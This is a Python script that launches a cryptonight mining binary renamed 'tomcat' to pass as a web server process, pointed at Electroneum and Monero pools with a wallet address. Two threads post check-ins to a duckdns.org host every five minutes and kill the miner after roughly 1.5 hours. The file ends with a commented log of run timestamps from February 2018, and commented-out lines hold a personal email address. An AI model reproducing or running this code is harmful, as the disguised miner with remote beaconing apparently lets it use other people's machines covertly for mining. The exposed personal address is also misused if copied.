import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:07.541146
#2018-02-17 16:11:06.829226
#2018-02-17 17:58:06.734037
#2018-02-17 19:46:04.238160
#2018-02-17 21:35:07.071020
#2018-02-17 23:19:05.987707
#2018-02-18 01:07:07.741236
#2018-02-18 02:54:04.754200
#2018-02-18 04:43:07.173240
#2018-02-18 06:35:07.110409
#2018-02-18 08:23:05.467508
#2018-02-18 10:12:01.407780
#2018-02-18 11:58:01.269967
#2018-02-18 13:43:04.132282
#2018-02-18 15:33:07.561275
#2018-02-18 17:21:05.383805
#2018-02-18 19:10:04.190830
#2018-02-18 20:56:05.235912
#2018-02-18 22:41:06.326472
#2018-02-19 00:30:08.234289
#2018-02-19 02:15:08.351246
#2018-02-19 04:04:03.574144
#2018-02-19 05:47:06.969732
#2018-02-19 07:34:07.413142
#2018-02-19 09:24:08.334938
#2018-02-19 11:13:03.788199
#2018-02-19 12:59:08.360405
#2018-02-19 14:47:01.384635
#2018-02-19 16:37:01.781234
#2018-02-19 18:24:06.599228
#2018-02-19 20:11:07.277266
#2018-02-19 22:01:04.129001
#2018-02-19 23:48:03.200387
#2018-02-20 01:35:05.617027
#2018-02-20 03:23:06.392303
#2018-02-20 05:10:07.500619
#2018-02-20 06:53:04.494170
#2018-02-20 08:40:04.094639
#2018-02-20 10:24:03.932147
#2018-02-20 12:08:05.600336
#2018-02-20 13:57:01.980717
#2018-02-20 15:41:11.829138
#2018-02-20 17:27:04.383619
#2018-02-20 19:16:05.752800
#2018-02-20 21:04:08.530250
#2018-02-20 22:49:01.431232
#2018-02-21 00:31:02.213225
#2018-02-21 02:16:05.952877
#2018-02-21 04:03:07.068173
#2018-02-21 05:51:03.966902
#2018-02-21 07:39:05.356531
#2018-02-21 09:24:01.614355
#2018-02-21 11:13:07.734225
#2018-02-21 13:01:08.653152
#2018-02-21 14:49:04.265422
#2018-02-21 16:36:08.569926
#2018-02-21 18:26:06.465230
#2018-02-21 20:13:06.940642
#2018-02-21 22:03:01.399409
#2018-02-21 23:50:09.682346
#2018-02-22 01:39:07.751345
#2018-02-22 03:28:02.044055
#2018-02-22 05:15:01.615548
#2018-02-22 06:59:01.670711
#2018-02-22 08:46:07.084963
#2018-02-22 10:36:01.697968
#2018-02-22 12:22:05.886764
#2018-02-22 14:07:08.102824
#2018-02-22 15:53:08.186913
#2018-02-22 17:40:09.734408
#2018-02-22 19:27:01.664528
#2018-02-22 21:18:05.948780
#2018-02-22 23:03:01.401499
#2018-02-23 00:48:06.387603
#2018-02-23 02:35:07.748892
#2018-02-23 04:24:05.551918
#2018-02-23 06:09:05.446398
#2018-02-23 07:55:06.108799
#2018-02-23 10:12:03.373109
#2018-02-23 12:06:05.324120
#2018-02-23 13:54:04.239238
#2018-02-23 15:46:01.958186
#2018-02-23 17:32:07.372954
#2018-02-23 19:18:06.802592
#2018-02-23 21:01:07.837550
#2018-02-23 22:48:07.258401
#2018-02-24 00:36:07.398036
#2018-02-24 02:26:03.774181
#2018-02-24 04:16:05.038953
#2018-02-24 06:04:06.467592
#2018-02-24 07:52:01.564287
#2018-02-24 09:37:04.311100
#2018-02-24 11:31:05.957483
#2018-02-24 13:20:06.635475
#2018-02-24 15:10:07.417507
#2018-02-24 16:58:06.462476
#2018-02-24 18:46:05.418425
#2018-02-24 20:38:04.089599
#2018-02-24 22:44:06.484234
#2018-02-25 02:05:07.999727
#2018-02-25 05:50:07.349318
#2018-02-25 11:37:04.605620